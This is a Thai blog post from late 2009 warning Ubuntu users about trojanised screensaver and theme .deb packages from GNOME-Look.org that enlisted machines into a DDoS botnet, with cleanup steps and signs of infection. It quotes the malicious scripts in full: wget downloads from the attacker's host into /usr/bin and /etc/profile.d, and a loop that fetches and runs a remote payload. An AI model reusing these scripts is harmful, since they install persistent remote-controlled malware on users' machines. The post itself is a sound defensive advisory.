CBOX เสรีชน

31 ธันวาคม, 2552

เตือนภัย! Malware สำหรับ Ubuntu ออกมาเพ่นพ่านแล้ว

http://ubuntuclub.com/node/1571

ขอยกบทความของ akedemo เอาไว้เป็นอุทหรณ์ posted

สำหรับผู้ใช้ Ubuntu (และ GNU/Linux อื่นๆ) ที่เคยคิดว่า OS ของตัวเอง “ปลอดภัย 100%” เลยย่ามใจชอบคลิกติดตั้งอะไรมั่วซั่ว (เขียนอะไรเนี่ย เข้าตัวเองหมดเลย :-( ) โปรดระวังตัว ตอนนี้เริ่มมีคนสนใจทำ Malware สำหรับ Ubuntu แล้ว และไม่ใช่ Virus ที่รันผ่าน WINE ด้วย คราวนี้ของจริง

เมื่อวานนี้ มีคนใน Ubuntuforums ว่าเจอพฤติกรรมแปลกๆ จากไฟล์ .deb ที่ดาวน์โหลดมาจาก GNOME-Look.org ไฟล์แรกเป็น Screensaver ชื่อ “Waterfall” ต่อมาก็พบไฟล์โจทย์อันที่สองคือ Theme ที่ใช้ชื่อว่า “Ninja” ทั้งสองไฟล์นี้แฝง code ประหลาดๆ เอาไว้แทนที่จะเป็นไฟล์ติดตั้ง Screensaver หรือ Theme อย่างที่อ้าง ลักษณะ code ที่มีคนแจ้งไว้ใน http://ubuntuforums.org/showthread.php?t=1349678 มีลักษณะดังนี้

01 #!/bin/sh
02 cd /usr/bin/
03 rm Auto.bash
04 sleep 1
05 wget http://05748.t35.com/Bots/Auto.bash
06 chmod 777 Auto.bash
07 echo -----------------
08 cd /etc/profile.d/
09 rm gnome.sh
10 sleep 1
11 wget http://05748.t35.com/Bots/gnome.sh
12 chmod 777 gnome.sh
13 echo -----------------
14 clear
15 exit

ซึ่งจากการสืบค้นของ นักสืบ Pantip เอ๊ย ไม่ใช่ สมาชิกใน Ubuntuforums ก็พบว่า Script ทั้งหลายใน .deb package ดังกล่าวคือคำสั่งในการควบคุมเครื่องเหยื่อให้กลายเป็น bot สำหรับยิง DDoS ถ้าพูดกันง่ายๆ ตามภาษาของ OS ที่โดนเจาะจนพรุน (ซึ่งคุณก็รู้ว่าคือ OS อะไร) นี่คือไฟล์ Trojans สำหรับ Ubuntu นั่นเอง (และอาจจะมีผล GNU/Linux สาย Debian ตัวอื่นๆ ด้วย)

ถ้าเกิดมีคนไหนเผลอเอา Theme หรือ Screensaver ดังกล่าวมาลงไปแล้ว หรือ ไม่แน่ใจว่าเคยเผลอเอามาลงหรือเปล่า อย่าเพิ่งตกใจ เพราะวิธีแก้ไม่ยาก แค่รันคำสั่งข้างล่าง

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

แต่อย่าไปรันคำสั่งนี้มั่วซั่ว กรุณามั่นใจก่อนว่าเครื่องคุณมี Trojans ตัวนี้จริงๆ ลักษณะสังเกตก็ไม่น่าจะยาก ตั้งสติแล้วทบทวนดูว่า

  • คุณเคยลง Theme หรือ Screensaver ที่เป็น .deb แต่ไม่มีรายการโผล่ Theme หรือ Screensaver อันใหม่ขึ้นมาให้เลือกหรือเปล่า
  • ลองเช็คใน System Monitor ดูว่าเครื่องคุณมีการรันโปรแกรมหรือสคริปต์ประหลาดๆ ที่ไม่รู้จักหรือเปล่า
  • และสคริปต์ดังกล่าวไปเรียกดาวน์โหลดหรือยิง packets ไปที่ไหนหรือไม่
  • ลองหาดูว่ามีไฟล์ /usr/bin/Auto.bash, /usr/bin/run.bash, /etc/profile.d/gnome.sh เหล่านี้อยู่ในเครื่องหรือเปล่า ถ้ามีลองเปิดดู (เปิดกับ text editor นะ อย่าไปกด Run) ว่าข้างในมีลักษณะคล้ายๆ แบบนี้หรือไม่
01 while :
02 do
03 rm /usr/bin/run.bash
04 cd /usr/bin/
05 wget http://05748.t35.com/Bots/index.php
06 wget http://05748.t35.com/Bots/run.bash
07 sleep 4
08 rm index.php
09 chmod 755 run.bash
10 command -p /usr/bin/run.bash
11 done

ถ้าทุกอย่างตรง โดยเฉพาะสองข้อหลัง ให้รู้ตัวไว้เลยว่าเครื่องคุณ “โดน” ซะแล้ว หลังจากรันคำสั่งแก้ไขแล้ว เพื่อความปลอดภัยขั้นสูงสุด ควรจะไปอ่านรายละเอียดจากกระทู้นี้ http://ubuntuforums.org/showthread.php?t=1349801 ใน Ubuntuforums ด้วย

ที่มา

  1. http://www.omgubuntu.co.uk/2009/12/malware-found-in-screensaver-for-ubuntu.html
  2. http://www.omgubuntu.co.uk/2009/12/yet-more-malware-found-on-gnome-look.html

 

ป.ล. อ่านเรื่องนี้แล้ว อย่าเพิ่งด่วนสรุปว่า Linux ไม่ปลอดภัย เพราะว่านี่ไม่ใช่การเจาะผ่านช่องโหว่ของ OS หรือของโปรแกรมใดๆ ทั้งสิ้น แต่เป็นการเจาะผ่านช่องโหว่ตัวสำคัญในระบบ คือ… ผู้ใช้ นั่นเอง หรือจะเรียกว่าเป็น Social Engineering รูปแบบหนึ่งก็ได้ ซึ่งทุก OS ในโลกมีโอกาสโดนเจาะแบบนี้เท่าเทียมกันหมด

ตรงกันข้าม อาจจะมองในอีกแง่ได้ด้วยว่า ธรรมชาติที่เป็น Open Source และชุมชนผู้ใช้เป็นสิ่งที่ทำให้ GNU/Linux OS แข็งแกร่งและปลอดภัยกว่า OS อื่นๆ ที่เป็น Closed source, Proprietary มากมาย เพราะการเผยแพร่ Source code ทำให้ผู้ใช้ทุกคนช่วยกันสอดส่องมองหาโปรแกรมที่ประพฤติตัวแปลกๆ ได้ ผลที่ได้ก็คือ ไม่ว่าจะเป็นช่องโหว่, malwares หรือ trojans สามารถถูกตรวจพบและแก้ไขได้อย่างรวดเร็ว เพื่อยืนยันความจริงข้อนี้ ผมขอบอกว่า ภายในเวลาไม่ถึง 24 ชั่วโมงนับจากมีคนตรวจพบ ไฟล์ทั้งสองได้ถูกลบออกจาก GNOME-Look.org เรียบร้อยโรงเรียนลินุกซ์ไปแล้ว

หลังจากนี้ก็ต้องมาดูกันว่า เว็บ GNOME-Look.org และผองเพื่อนในเครือ Opendesktop.org จะมีมาตรการในการป้องกันการกระทำผิดลักษณะนี้อย่างไร



ไม่มีความคิดเห็น: